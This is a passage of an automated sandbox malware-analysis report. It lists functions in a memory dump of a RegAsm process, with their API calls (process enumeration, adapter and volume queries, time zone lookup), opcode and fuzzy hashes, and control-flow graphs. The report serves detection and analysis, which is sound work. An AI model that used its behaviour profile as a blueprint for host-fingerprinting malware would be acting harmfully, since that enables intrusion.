                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: lstrcat
                                                                                                          • String ID: !*2y$"*2y$D@D$D@D$Pc>2$Pc>2$vTT$|C?g$}C?g$}C?g
                                                                                                          • API String ID: 4038537762-1154530197
                                                                                                          • Opcode ID: 8fdd1ed8e5b778af510f68b91defb39f8f87b8bb22ab86dc7083df389a6e0ac0
                                                                                                          • Instruction ID: 27e6e9d45b57d3cee8e3eb274bf968d618a2379235462c408c449a921eceaa01
                                                                                                          • Opcode Fuzzy Hash: 8fdd1ed8e5b778af510f68b91defb39f8f87b8bb22ab86dc7083df389a6e0ac0
                                                                                                          • Instruction Fuzzy Hash: 03E2C871E016199BDF24EF98C981AFE7670AB05304F24451BE605EB3A0D3788AD1DBDB
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004090F8 Relevance: 27.4, APIs: 10, Strings: 5, Instructions: 1156libraryloaderprocessCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004093C6
                                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 00409599
                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004096FA
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0040A409
                                                                                                          • Process32FirstW.KERNEL32(?,?), ref: 0040A423
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$CreateFirstHandleModuleProcess32SnapshotToolhelp32
                                                                                                          • String ID: "*2y$"*2y$9$C@D$D@D
                                                                                                          • API String ID: 3265287541-2590425928
                                                                                                          • Opcode ID: d7888a6f0540df15007fd4160b7ba3035e11df803ac81f99cb91972441f3abd6
                                                                                                          • Instruction ID: 34b8d58beaa096617f5e474222152995c9015bdab263341ec297e93acded2113
                                                                                                          • Opcode Fuzzy Hash: d7888a6f0540df15007fd4160b7ba3035e11df803ac81f99cb91972441f3abd6
                                                                                                          • Instruction Fuzzy Hash: 1DA29174E0030A9BDF148B98D8869BE7BB0AB45304F64453BE515FB3E2D3788D518B9B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0040A878 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 734fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040AB31
                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040AB3A
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0040ABC7
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0040ABE3
                                                                                                          • ExitProcess.KERNEL32 ref: 0040B522
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateExitHandleModuleNameProcessRead
                                                                                                          • String ID: 91x$:1x$e)=$f)=$f)=
                                                                                                          • API String ID: 1071776683-4185138681
                                                                                                          • Opcode ID: 428e4df45deb3a195276ab61222abbe9fc063120b6bdb81bb96080e113e47a04
                                                                                                          • Instruction ID: c2f796b02151e558e4cd2405a28089c1003d7c260324ffc2d6cd1f06cfe82e6b
                                                                                                          • Opcode Fuzzy Hash: 428e4df45deb3a195276ab61222abbe9fc063120b6bdb81bb96080e113e47a04
                                                                                                          • Instruction Fuzzy Hash: F55290719007018BDB389F19C59462A76E0EF14314768C93FE196EBBE1E73CE8568B4B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00421AC8 Relevance: 13.1, APIs: 2, Strings: 5, Instructions: 828COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 004226CF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AdaptersInfo
                                                                                                          • String ID: BbA$[-/M$[-/M$`wJl$`wJl
                                                                                                          • API String ID: 3177971545-1840906695
                                                                                                          • Opcode ID: de66aee730ffd3c215ff0d257bfd620dc9021a0f2271fca5b3861f45361d8d01
                                                                                                          • Instruction ID: 357383bcf4038bb756c9dd97774ee4b78dfcc2a21f2e836d74d6459984ec56c8
                                                                                                          • Opcode Fuzzy Hash: de66aee730ffd3c215ff0d257bfd620dc9021a0f2271fca5b3861f45361d8d01
                                                                                                          • Instruction Fuzzy Hash: 0762C870F002259BDF24DB98EAC267FB6B0AB14344FA4452BD512EB361D778D941CB8B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00458344 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116timeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 7522 458344-458374 call 457e8b call 457f15 call 457ee9 7529 458493-45849d call 452a87 7522->7529 7530 45837a-458386 call 457e91 7522->7530 7530->7529 7535 45838c-458398 call 457ebd 7530->7535 7535->7529 7538 45839e-4583bf call 4529a4 GetTimeZoneInformation 7535->7538 7541 4583c5-4583e5 7538->7541 7542 458470-458492 call 457e85 call 457e79 call 457e7f 7538->7542 7543 4583e7-4583ec 7541->7543 7544 4583ef-4583f7 7541->7544 7543->7544 7546 458409-45840b 7544->7546 7547 4583f9-458400 7544->7547 7550 45840d-45846d call 4414a0 * 4 call 455a58 call 458302 * 2 7546->7550 7547->7546 7549 458402-458407 7547->7549 7549->7550 7550->7542
                                                                                                          APIs
                                                                                                            • Part of subcall function 004529A4: RtlFreeHeap.NTDLL(00000000,00000000,?,00455CE1,?,00000000,?,?,00455BFD,?,00000007,?,?,00456339,?,?), ref: 004529BA
                                                                                                            • Part of subcall function 004529A4: GetLastError.KERNEL32(?,?,00455CE1,?,00000000,?,?,00455BFD,?,00000007,?,?,00456339,?,?), ref: 004529C5
                                                                                                          • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,004587D8,0041A797,?), ref: 004583B6
                                                                                                          Strings
                                                                                                          • W. Europe Standard Time, xrefs: 0045844F
                                                                                                          • W. Europe Daylight Time, xrefs: 00458463
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                                                          • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                          • API String ID: 3335090040-986674615
                                                                                                          • Opcode ID: 745e8091ca43396c5768c430505b44f6a1d466d0ebeac642c5bb0174e9299731
                                                                                                          • Instruction ID: b685551fd1686a2fb22fb6dba49427adb5c2dffbef7d1536a4bdec0201957d12
                                                                                                          • Opcode Fuzzy Hash: 745e8091ca43396c5768c430505b44f6a1d466d0ebeac642c5bb0174e9299731
                                                                                                          • Instruction Fuzzy Hash: E231D372901211EBCB10AF66DC4295F7B68AF01755B11807FFC08E7262EB789D458B98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0043E949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0003EA73,0043E3C3), ref: 0043E94E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: 5e2fb61ac6d75a5f4229ec6f89e9841573719cdd5d8bbab4c92685ea8f0827a4
                                                                                                          • Instruction ID: 75304f21a955307eee70546b2b4ddbbcaf70fa27c0e1829879405b0b080d7e28
                                                                                                          • Opcode Fuzzy Hash: 5e2fb61ac6d75a5f4229ec6f89e9841573719cdd5d8bbab4c92685ea8f0827a4
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004039E8 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 293stringCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 6057 4039e8-4039fe 6058 403a04-403a0c 6057->6058 6059 403a75-403a7a 6058->6059 6060 403a0e-403a13 6058->6060 6063 403a80-403a85 6059->6063 6064 403b02-403b07 6059->6064 6061 403ab8-403abd 6060->6061 6062 403a19-403a1e 6060->6062 6071 403bc2-403bc7 6061->6071 6072 403ac3-403ac8 6061->6072 6065 403b43-403b48 6062->6065 6066 403a24-403a29 6062->6066 6069 403b97-403b9c 6063->6069 6070 403a8b-403a90 6063->6070 6067 403bf9-403bfe 6064->6067 6068 403b0d-403b12 6064->6068 6085 403d34-403d5f call 408d40 lstrcatW * 2 call 44bd43 6065->6085 6086 403b4e-403b53 6065->6086 6077 403c2d-403c4e call 4409a0 6066->6077 6078 403a2f-403a34 6066->6078 6081 403e24-403e41 6067->6081 6082 403c04-403c09 6067->6082 6083 403cf4-403d12 6068->6083 6084 403b18-403b1d 6068->6084 6073 403ba2-403ba7 6069->6073 6074 403dcf-403e04 call 4409a0 call 408d40 6069->6074 6087 403a96-403a9b 6070->6087 6088 403c5f-403c71 call 401b9c 6070->6088 6079 403e09-403e1f 6071->6079 6080 403bcd-403bd2 6071->6080 6075 403ca4-403cc4 lstrcatW 6072->6075 6076 403ace-403ad3 6072->6076 6089 403e46-403e4b 6073->6089 6090 403bad-403bbd 6073->6090 6074->6058 6075->6058 6099 403cc9-403cef lstrcatW * 2 6076->6099 6100 403ad9-403ade 6076->6100 6077->6058 6091 403c53-403c5a 6078->6091 6092 403a3a-403a3f 6078->6092 6079->6058 6080->6058 6093 403bd8-403bf4 6080->6093 6081->6058 6082->6058 6094 403c0f-403c28 6082->6094 6083->6058 6102 403b23-403b28 6084->6102 6103 403d17-403d2f 6084->6103 6131 403d64-403d71 6085->6131 6104 403d76-403dca lstrcatW call 408d40 lstrcatW * 2 6086->6104 6105 403b59-403b5e 6086->6105 6096 403aa1-403aa6 6087->6096 6097 403c76-403c95 6087->6097 6088->6058 6089->6058 6109 403e51-403e7c call 408d40 call 4118b6 6089->6109 6090->6058 6091->6058 6092->6058 6108 403a41-403a65 call 402542 6092->6108 6093->6058 6094->6058 6096->6058 6111 403aac-403ab3 6096->6111 6113 403c97 6097->6113 6114 403c9c-403c9f 6097->6114 6099->6058 6100->6058 6115 403ae4-403aeb call 44bd43 6100->6115 6102->6058 6117 403b2e-403b3e 6102->6117 6103->6058 6104->6058 6105->6058 6119 403b64-403b87 6105->6119 6108->6114 6132 403a6b-403a70 6108->6132 6134 403e81-403e88 6109->6134 6111->6058 6113->6114 6114->6058 6130 403af0-403afd 6115->6130 6117->6058 6119->6114 6126 403b8d-403b92 6119->6126 6126->6114 6130->6058 6131->6058 6132->6114
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: lstrcat
                                                                                                          • String ID: xG%$xG%
                                                                                                          • API String ID: 4038537762-81035698
                                                                                                          • Opcode ID: 89169f92c5ff6abe6db00746a2ad07dc7cdee4232795b944825f756f97745120
                                                                                                          • Instruction ID: dbbb0f2f98305b37a0813a7b16e56cdb622eb9a3d041120435c394f279a66c68
                                                                                                          • Opcode Fuzzy Hash: 89169f92c5ff6abe6db00746a2ad07dc7cdee4232795b944825f756f97745120
                                                                                                          • Instruction Fuzzy Hash: 5EB1D3B2E001599BDF109F99CC429AEBE78BF18315F244527E610F63E1D3798E518F8A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00431294 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 165COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 6404 431294-4312b1 6405 4312b7-4312bc 6404->6405 6406 4312f2-4312f7 6405->6406 6407 4312be-4312c3 6405->6407 6410 431397-43139c 6406->6410 6411 4312fd-431302 6406->6411 6408 431331-431336 6407->6408 6409 4312c5-4312ca 6407->6409 6414 431477-43147f 6408->6414 6415 43133c-431341 6408->6415 6418 4313c0-4313eb 6409->6418 6419 4312d0-4312d5 6409->6419 6416 4313a2-4313a7 6410->6416 6417 4314b6-4314bb 6410->6417 6412 431308-43130d 6411->6412 6413 43140c-431433 6411->6413 6421 431443-431467 6412->6421 6422 431313-431318 6412->6422 6413->6405 6420 431439-43143e 6413->6420 6414->6405 6423 431347-43134c 6415->6423 6424 431484-4314b1 6415->6424 6425 4314c0-4314c5 6416->6425 6426 4313ad-4313bb 6416->6426 6417->6405 6418->6405 6429 4313f1-4313f6 6418->6429 6427 4313fb-431407 GetSystemMetrics 6419->6427 6428 4312db-4312e0 6419->6428 6420->6405 6421->6405 6430 43146d-431472 6421->6430 6422->6405 6431 43131a-43132f GetSystemMetrics 6422->6431 6423->6405 6432 431352-431392 call 431a80 CreateDCW 6423->6432 6424->6405 6425->6405 6433 4314cb-4314f6 call 430eea DeleteDC 6425->6433 6426->6405 6427->6405 6428->6405 6434 4312e2-4312f0 6428->6434 6429->6405 6430->6405 6431->6405 6432->6405 6434->6405
                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32 ref: 00431325
                                                                                                          • CreateDCW.GDI32(?,00000000,00000000,00000000), ref: 00431388
                                                                                                          • GetSystemMetrics.USER32 ref: 004313FD
                                                                                                          • DeleteDC.GDI32(?), ref: 004314E4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$CreateDelete
                                                                                                          • String ID: xG%$xG%$xG%
                                                                                                          • API String ID: 1043530637-1616704207
                                                                                                          • Opcode ID: 15ca8358abb26186f66532ea6359700e49478575d0e667f08ad233f8822f48a9
                                                                                                          • Instruction ID: e9c40f6a15dddf9dbe83c8755fe1fb163e7e7b328ee19a1304f3c76adae135dc
                                                                                                          • Opcode Fuzzy Hash: 15ca8358abb26186f66532ea6359700e49478575d0e667f08ad233f8822f48a9
                                                                                                          • Instruction Fuzzy Hash: 82519271A015088BDB188B98C895D7FBAB1EB5E310F24916BE405FB7B0D2398D41CB9A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00422919 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 7663 422919-422939 GetVolumeInformationW
                                                                                                          APIs
                                                                                                          • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000,8681AF85,?,00424097), ref: 0042292D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: InformationVolume
                                                                                                          • String ID: C:\
                                                                                                          • API String ID: 2039140958-3404278061
                                                                                                          • Opcode ID: 97c22a736139e3911d92e50279b4b2d161076827c1acffce5e3a0f6afb6726f9
                                                                                                          • Instruction ID: a7167dd5f6dcaca79aa8bae8c2332e0e10afd782a6877a38d487df3357db5a74
                                                                                                          • Opcode Fuzzy Hash: 97c22a736139e3911d92e50279b4b2d161076827c1acffce5e3a0f6afb6726f9
                                                                                                          • Instruction Fuzzy Hash: D0D002F1A11221BFB2609F29AC49DB77ADCEA496607190469BC89C2240E1A05D94CAB6
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00457A3A Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 7664 457a3a-457a47 GetEnvironmentStringsW 7665 457a49-457a4a 7664->7665 7666 457a4b-457a5b call 457a88 call 4532ef 7664->7666 7670 457a60-457a66 7666->7670 7671 457a73-457a87 call 4529a4 FreeEnvironmentStringsW 7670->7671 7672 457a68-457a70 call 4409a0 7670->7672 7672->7671
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,0044A011), ref: 00457A3D
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,0044A011), ref: 00457A7C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3328510275-0
                                                                                                          • Opcode ID: 2b0685727c8171de773814f91d602a620f67dd648ccb32de6df32e5c1d7f1495
                                                                                                          • Instruction ID: 18535471c04b116fd5b6d97432ef9d3e82689ee57d6b51c3cd61f3382a8d7378
                                                                                                          • Opcode Fuzzy Hash: 2b0685727c8171de773814f91d602a620f67dd648ccb32de6df32e5c1d7f1495
                                                                                                          • Instruction Fuzzy Hash: ABE09B67A09A2137E211363A7C499AF1A5ACFC277AB15013BFC1056283EE594E0641BE
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004529A4 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00455CE1,?,00000000,?,?,00455BFD,?,00000007,?,?,00456339,?,?), ref: 004529BA
                                                                                                          • GetLastError.KERNEL32(?,?,00455CE1,?,00000000,?,?,00455BFD,?,00000007,?,?,00456339,?,?), ref: 004529C5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 485612231-0
                                                                                                          • Opcode ID: 0b82ea54d05a3f1ee944c50458815860b2ea8dd86904ec07870acde344d2c05b
                                                                                                          • Instruction ID: 0eda7edd8cad29e357ae79bfd7352963475fa98f26119a2b20a35611bd27aa5f
                                                                                                          • Opcode Fuzzy Hash: 0b82ea54d05a3f1ee944c50458815860b2ea8dd86904ec07870acde344d2c05b
                                                                                                          • Instruction Fuzzy Hash: 6AE08672601304AFDB112BA2EC087577A58AB44755F104027F60896262D6788D9497DC
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00454AB0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000000,00407D71,?,00451999,00000001,00000364,00407D71,00000006,000000FF,?,0044CAD6,?,0040103B,?,00000000), ref: 00454AF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 12a2a842729759fea2c48161febabcb296c15b5b2824023144b7cfaf729b0798
                                                                                                          • Instruction ID: 5e98d373e1e1f474a2c54cf50db67855681b7e13bf73b929c967896598654ceb
                                                                                                          • Opcode Fuzzy Hash: 12a2a842729759fea2c48161febabcb296c15b5b2824023144b7cfaf729b0798
                                                                                                          • Instruction Fuzzy Hash: 7AF0593568122477DBA29B239C01B1B3748AFC177EB154027FC05AF282CA68DC8983ED
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004532EF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,004525E9,?,?,004525E9,00000220,?,?,?), ref: 00453321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 1f0db84fc47fc2ae10e562a5081a66fdd9b7a4443acd2dfb35c85110bfd68399
                                                                                                          • Instruction ID: 6c40969103cae06692a820334a9e74d192653667edfb4226e4dd7ec3d2c61166
                                                                                                          • Opcode Fuzzy Hash: 1f0db84fc47fc2ae10e562a5081a66fdd9b7a4443acd2dfb35c85110bfd68399
                                                                                                          • Instruction Fuzzy Hash: B4E0ED31601321A7EB222E669C00B5F7A489F823E7F150023FC14A62D3DE68CE0981EE
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%